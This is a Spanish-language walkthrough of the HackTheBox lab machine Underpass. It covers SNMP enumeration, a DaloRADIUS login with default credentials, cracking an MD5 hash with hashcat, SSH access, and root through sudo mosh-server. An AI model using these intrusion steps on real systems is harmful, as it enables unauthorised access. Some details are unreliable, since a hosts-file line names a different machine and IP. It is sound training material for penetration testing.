Publicado: 08 de Junio de 2025
Autor: José Miguel Romero aKa x3m1SecDificultad: ⭐ Easy
📝 Descripción
Underpass es una máquina Linux de dificultad Easy de HackTheBox que presenta un escenario realista de administración de servicios RADIUS. La explotación se centra en el descubrimiento de información sensible a través de SNMP, seguido de la enumeración de un panel web de DaloRADIUS mal configurado que expone credenciales de usuarios.
🎯 Objetivos de Aprendizaje
Enumeración SNMP: Técnicas de reconocimiento usando protocolos de gestión de red
Explotación Web: Análisis de aplicaciones RADIUS y paneles administrativos
Cracking de Hashes: Recuperación de credenciales mediante ataques de diccionario
Escalada de Privilegios: Abuso de binarios con permisos sudo para ganar acceso root
🔧 Tecnologías Involucradas
SNMP v1/v2c: Protocolo de gestión de red para descobrimiento de información
DaloRADIUS 2.2 beta: Panel web de administración RADIUS
Apache 2.4.52: Servidor web con aplicaciones PHP
Mosh (Mobile Shell): Herramienta de shell remoto con vulnerabilidad de escalada
📊 Categorías de Vulnerabilidades
Information Disclosure via SNMP
Weak Authentication en paneles administrativos
Password Hash Exposure en bases de datos
Sudo Misconfiguration para escalada de privilegios
🔭 Reconocimiento
Ping para verificación en base a TTL
❯ ping -c2 10.10.11.48
PING 10.10.11.48 (10.10.11.48) 56(84) bytes of data.
64 bytes from 10.10.11.48: icmp_seq=1 ttl=63 time=43.7 ms
64 bytes from 10.10.11.48: icmp_seq=2 ttl=63 time=43.8 ms
--- 10.10.11.48 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1004ms
rtt min/avg/max/mdev = 43.734/43.762/43.791/0.028 ms
💡 Nota: El TTL cercano a 64 sugiere que probablemente sea una máquina Linux.
❯ nmap -sC -sV -p$ports 10.10.11.48 -oN services.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 11:56 CEST
Nmap scan report for 10.10.11.48
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Escaneo de puertos UDP
nmap -sU -F 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 12:16 CEST
Nmap scan report for 10.10.11.48
Host is up (0.044s latency).
Not shown: 97 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp
1812/udp open|filtered radius
1813/udp open|filtered radacct
🐍 Análisis del puerto 161 UDP SNMP
Usamos la herramienta snmpbrute para intentar descubrir recursos en red con nombres comunidades públicas que puedan estar expuestas en este servicio
snmpbrute -t 10.10.11.48
Usamos la herramienta snmp-check para extraer strings de las comunidades enumeradas anteriormente para ver si descubrimos algún recurso interensante:
snmp-check -c public -v1 10.10.11.48
No descubrimos nada más alla del nombre de vhost que añadiremos a nuestro fichero /etc/hosts, la versión del kernel de linux del host y un usuario llamado steve
⚠️ Debemos añadir el siguiente vhost a nuestro fichero /etc/hosts
echo "10.10.11.47 linkvortex.htb" | sudo tee -a /etc/hosts
🌐 Enumeración Web
🏠 Puerto 80 HTTP (underpass.htb)
No encontramos gran cosa al enumerar el sitio de forma manual salvo la típica web de apache en construcción.
📂 Fuzzing de directorios
Tras probar a realizar fuzzing de directorios con ferxobuster y la lista /usr/share/seclists/Discovery/Web-Content/common.txt encontramos algunos recursos interesantes:
El directorio /app parece ser bastante relevante por lo que realizamos nuevamente fuzzing sobre el mismo usando en esta ocasión la lista usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt y encontramos algunos recursos adicionales para añadir a nuestro scope:
🔓 Explotación - Panel DaloRADIUS
Probamos de nuevo con las credenciales por defecto:
Logramos entrar con la cuenta administrator:radius
💎 Extracción de credenciales
Enumeramos información dentro del servicio para ver si encontramos algo interesante. A los pocos minutos encontramos una opción que nos permite listar información de los usuarios y encontramos un hash de un usuario llamado svcMosh:
🔨 Cracking del hash MD5
Vemos que se trata de un hash en MD5 y lo crackeamos usando hashcat y el diccionario rockyou:
nth --text '412DD4759978ACFCC81DEAB01B382403'
hashcat -a 0 -m 0 '412DD4759978ACFCC81DEAB01B382403' /usr/share/wordlists/rockyou.txt
🔑 Acceso inicial
Y obtenemos la contraseña: underwaterfriends. Ahora que tenemos una credencial, podemos intentar usarla con el servicio SSH para ver si es válida. Una pequeña prueba con netexec nos revela que la credencial es válida con este servicio:
0.10.11.48's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sun Jun 8 10:58:23 AM UTC 2025
System load: 0.0 Processes: 226
Usage of /: 52.4% of 6.56GB Users logged in: 0
Memory usage: 16% IPv4 address for eth0: 10.10.11.48
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Jan 11 13:29:47 2025 from 10.10.14.62
svcMosh@underpass:~$
Obtenemos la primera flag en el directorio del usuario svcMosh:
svcMosh@underpass:~$ cd /home svcMosh@underpass:/home$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Dec 11 16:06 .
drwxr-xr-x 18 root root 4096 Dec 11 16:06 ..
drwxr-x--- 5 svcMosh svcMosh 4096 Jan 11 13:29 svcMosh
svcMosh@underpass:/home$ cd svcMosh/
svcMosh@underpass:~$ ls -la
total 36
drwxr-x--- 5 svcMosh svcMosh 4096 Jan 11 13:29 .
drwxr-xr-x 3 root root 4096 Dec 11 16:06 ..
lrwxrwxrwx 1 root root 9 Sep 22 2024 .bash_history -> /dev/null
-rw-r--r-- 1 svcMosh svcMosh 220 Sep 7 2024 .bash_logout
-rw-r--r-- 1 svcMosh svcMosh 3771 Sep 7 2024 .bashrc
drwx------ 2 svcMosh svcMosh 4096 Dec 11 16:06 .cache
drwxrwxr-x 3 svcMosh svcMosh 4096 Jan 11 13:29 .local
-rw-r--r-- 1 svcMosh svcMosh 807 Sep 7 2024 .profile
drwxr-xr-x 2 svcMosh svcMosh 4096 Dec 11 16:06 .ssh
-rw-r----- 1 root svcMosh 33 Jun 8 09:55 user.txt
svcMosh@underpass:~$ cat user.txt
## 🚀 Escalada de privilegios
🔍 Enumeración de permisos sudo
Comprobamos que el usuario svcmosh puede ejecutar el siguiente como root:
svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server
⚡ Explotación del binario mosh-server
Mosh (Mobile Shell) es una herramienta utilizada para conexiones remotas que mantiene sesiones activas incluso cuando hay interrupciones en la red. El binario mosh-server inicia un servidor de Mosh y puede aceptar parámetros que podrían ser explotados.
En este caso, usaremos la posibilidad de ejecutarlo como sudo para ganar acceso privilegiado.
Abusar de mosh-server para escalada de privilegios
sudo /usr/bin/mosh-server new -- /bin/bash
sudo: Ejecuta el comando con privilegios de superusuario.
/usr/bin/mosh-server: El binario que tiene permisos NOPASSWD según el resultado de sudo -l. Esto permite ejecutarlo sin contraseña.
new: Le dice a mosh-server que inicie una nueva sesión.
-- /bin/bash: Especifica que se quiere abrir un intérprete de comandos (shell) /bin/bash.
Este comando inicia una nueva instancia de mosh-server, que en este caso ejecuta un shell interactivo (/bin/bash) como superusuario (root) debido a los permisos de sudo asignados al binario.
El servidor genera una clave (MOSH_KEY) y asigna un puerto para la sesión de conexión 60002.
Conexión al servidor con mosh-client:
Aplicamos en el comando la key, la ip local host y el puerto:
MOSH_KEY=...: Exporta la clave de conexión generada por el servidor para que el cliente pueda autenticar la sesión.
mosh-client: Cliente de Mosh que se conecta al servidor.
127.0.0.1: Es la dirección del localhost, ya que el servidor y cliente están en la misma máquina.
60002: Es el puerto asignado al servidor mosh-server.
Resultado: Este comando establece una conexión entre el cliente y el servidor de Mosh, iniciando una sesión interactiva con permisos de root.
http://10.10.11.48/daloradius/app/operators/login.php
Aquí encontramos otro panel que parece estar destinado a los administradores. Además vemos una versión del servicio (2.2 beta)
